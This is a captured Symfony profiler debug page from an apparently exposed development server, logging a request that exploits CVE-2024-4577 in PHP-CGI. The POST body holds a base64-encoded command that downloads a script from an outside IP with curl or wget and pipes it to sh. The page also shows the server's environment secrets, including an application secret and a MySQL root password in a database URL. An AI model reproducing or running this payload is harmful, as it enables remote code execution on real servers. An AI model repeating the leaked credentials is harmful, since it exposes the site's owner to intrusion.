https://164.132.21.185/hello.world?p=hello.world&%ADd%20allow_url_include%3D1%20%ADd%20auto_prepend_file%3Dphp%3A%2F%2Finput=

n/a

Request

GET Parameters

Key Value
p
"hello.world"
�d_allow_url_include=1_�d_auto_prepend_file=php://input
""

POST Parameters

Key Value
<?php_shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA
"=")); echo(md5("Hello CVE-2024-4577")); ?>"

Uploaded Files

No files were uploaded

Request Attributes

Key Value
_remove_csp_headers
true
_stopwatch_token
"b8dc9a"

Request Headers

Header Value
accept
"*/*"
connection
"keep-alive"
content-length
"225"
content-type
"application/x-www-form-urlencoded"
host
"164.132.21.185:443"
upgrade-insecure-requests
"1"
user-agent
"Custom-AsyncHttpClient"
x-php-ob-level
"1"

Request Content

Raw

<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIHx8IHdnZXQgaHR0cDovLzk0LjE1Ni4xNzcuMTA5L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA==")); echo(md5("Hello CVE-2024-4577")); ?>

Response

Response Headers

Header Value
cache-control
"no-cache, private"
content-type
"text/html; charset=UTF-8"
date
"Wed, 06 Nov 2024 06:36:34 GMT"
x-debug-exception
"No%20route%20found%20for%20%22POST%20https%3A%2F%2F164.132.21.185%2Fhello.world%22"
x-debug-exception-file
"%2Fvar%2Fwww%2Finterface%2Fvendor%2Fsymfony%2Fhttp-kernel%2FEventListener%2FRouterListener.php:135"
x-debug-token
"f3f420"
x-debug-token-link
"https://164.132.21.185/_profiler/ac60d5"
x-previous-debug-token
"ac60d5"
x-robots-tag
"noindex"

Cookies

Request Cookies

No request cookies

Response Cookies

No response cookies

Session

Session Metadata

No session metadata

Session Attributes

No session attributes

Session Usage

0 Usages
Stateless check enabled

Session not used.

Flashes

Flashes

No flash messages were created.

Server Parameters

Server Parameters

Defined in .env

Key Value
ADMIN_EMAIL
"info@universalmedica.com"
APP_ENV
"dev"
APP_SECRET
"75d9667e6b2ae5a52abe2792d4aa04f4"
BASE_URLS
"https://test-veille.universalmedica.com/"
DATABASE_URL
"mysql://root:testveillepv@localhost:3306/veille_v2?serverVersion=5.7"
ELASTICSEARCH_URL
"http://localhost:9200/"
LOCK_DSN
"semaphore"
MAILER_URL
"null://localhost"
MESSENGER_TRANSPORT_DSN
"amqp://guest:guest@127.0.0.1:5672/%2f/messages"
REDIS_URL
"redis://localhost:6379"
REVUE_URL
"https://test-veille.universalmedica.com"
SITE_HELP
"https://test-veille.universalmedica.com/docs/index.html"

Defined as regular env variables

Key Value
APP_DEBUG
"1"
CONTENT_LENGTH
"225"
CONTENT_TYPE
"application/x-www-form-urlencoded"
CONTEXT_DOCUMENT_ROOT
"/var/www/interface/public/"
CONTEXT_PREFIX
""
DOCUMENT_ROOT
"/var/www/interface/public/"
GATEWAY_INTERFACE
"CGI/1.1"
HTTPS
"on"
HTTP_ACCEPT
"*/*"
HTTP_CONNECTION
"keep-alive"
HTTP_HOST
"164.132.21.185:443"
HTTP_UPGRADE_INSECURE_REQUESTS
"1"
HTTP_USER_AGENT
"Custom-AsyncHttpClient"
PATH
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin"
PHP_SELF
"/index.php"
QUERY_STRING
"p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_HTTPS
"on"
REDIRECT_QUERY_STRING
"p=hello.world&%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
REDIRECT_STATUS
"200"
REDIRECT_URL
"/hello.world"
REMOTE_ADDR
"103.123.175.254"
REMOTE_PORT
"48478"
REQUEST_METHOD
"POST"
REQUEST_SCHEME
"https"
REQUEST_TIME
1730874994
REQUEST_TIME_FLOAT
1730874994.7366
REQUEST_URI
"/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"
SCRIPT_FILENAME
"/var/www/interface/public/index.php"
SCRIPT_NAME
"/index.php"
SERVER_ADDR
"192.168.113.185"
SERVER_ADMIN
"webmaster@localhost"
SERVER_NAME
"164.132.21.185"
SERVER_PORT
"443"
SERVER_PROTOCOL
"HTTP/1.1"
SERVER_SIGNATURE
"<address>Apache/2.4.29 (Ubuntu) Server at 164.132.21.185 Port 443</address>\n"
SERVER_SOFTWARE
"Apache/2.4.29 (Ubuntu)"
SYMFONY_DOTENV_VARS
"APP_ENV,APP_SECRET,MAILER_URL,DATABASE_URL,SITE_HELP,BASE_URLS,REVUE_URL,MESSENGER_TRANSPORT_DSN,ADMIN_EMAIL,LOCK_DSN,ELASTICSEARCH_URL,REDIS_URL"

Sub Requests 1

ErrorController (token = ac60d5)

Key Value
_controller
"error_controller"
_stopwatch_token
"249a2c"
exception
Symfony\Component\HttpKernel\Exception\NotFoundHttpException {#1120
  -statusCode: 404
  -headers: []
  #message: "No route found for "POST https://164.132.21.185/hello.world""
  #code: 0
  #file: "/var/www/interface/vendor/symfony/http-kernel/EventListener/RouterListener.php"
  #line: 135
  -previous: Symfony\Component\Routing\Exception\ResourceNotFoundException {#1066 …}
  trace: {
    /var/www/interface/vendor/symfony/http-kernel/EventListener/RouterListener.php:135 {
      Symfony\Component\HttpKernel\EventListener\RouterListener->onKernelRequest(RequestEvent $event) …
      › 
      ›     throw new NotFoundHttpException($message, $e);} catch (MethodNotAllowedException $e) {
    }
    /var/www/interface/vendor/symfony/event-dispatcher/Debug/WrappedListener.php:117 {
      Symfony\Component\EventDispatcher\Debug\WrappedListener->__invoke(object $event, string $eventName, EventDispatcherInterface $dispatcher): void …
      › 
      › ($this->optimizedListener ?? $this->listener)($event, $eventName, $dispatcher);}
    /var/www/interface/vendor/symfony/event-dispatcher/EventDispatcher.php:230 {
      Symfony\Component\EventDispatcher\EventDispatcher->callListeners(iterable $listeners, string $eventName, object $event) …
      ›     }    $listener($event, $eventName, $this);}
    }
    /var/www/interface/vendor/symfony/event-dispatcher/EventDispatcher.php:59 {
      Symfony\Component\EventDispatcher\EventDispatcher->dispatch(object $event, string $eventName = null): object …
      › if ($listeners) {    $this->callListeners($listeners, $eventName, $event);}
    }
    /var/www/interface/vendor/symfony/event-dispatcher/Debug/TraceableEventDispatcher.php:154 {
      Symfony\Component\EventDispatcher\Debug\TraceableEventDispatcher->dispatch(object $event, string $eventName = null): object …
      › try {    $this->dispatcher->dispatch($event, $eventName);} finally {
    }
    /var/www/interface/vendor/symfony/http-kernel/HttpKernel.php:128 {
      Symfony\Component\HttpKernel\HttpKernel->handleRaw(Request $request, int $type = self::MAIN_REQUEST): Response …
      › $event = new RequestEvent($this, $request, $type);$this->dispatcher->dispatch($event, KernelEvents::REQUEST);}
    /var/www/interface/vendor/symfony/http-kernel/HttpKernel.php:74 {
      Symfony\Component\HttpKernel\HttpKernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->handleRaw($request, $type);} catch (\Exception $e) {
    }
    /var/www/interface/vendor/symfony/http-kernel/Kernel.php:202 {
      Symfony\Component\HttpKernel\Kernel->handle(Request $request, int $type = HttpKernelInterface::MAIN_REQUEST, bool $catch = true) …
      › try {    return $this->getHttpKernel()->handle($request, $type, $catch);} finally {
    }
    /var/www/interface/public/index.php:31 {$request = Request::createFromGlobals();$response = $kernel->handle($request);$response->send();
    }
  }
}
logger
Symfony\Bridge\Monolog\Logger {#210 …6}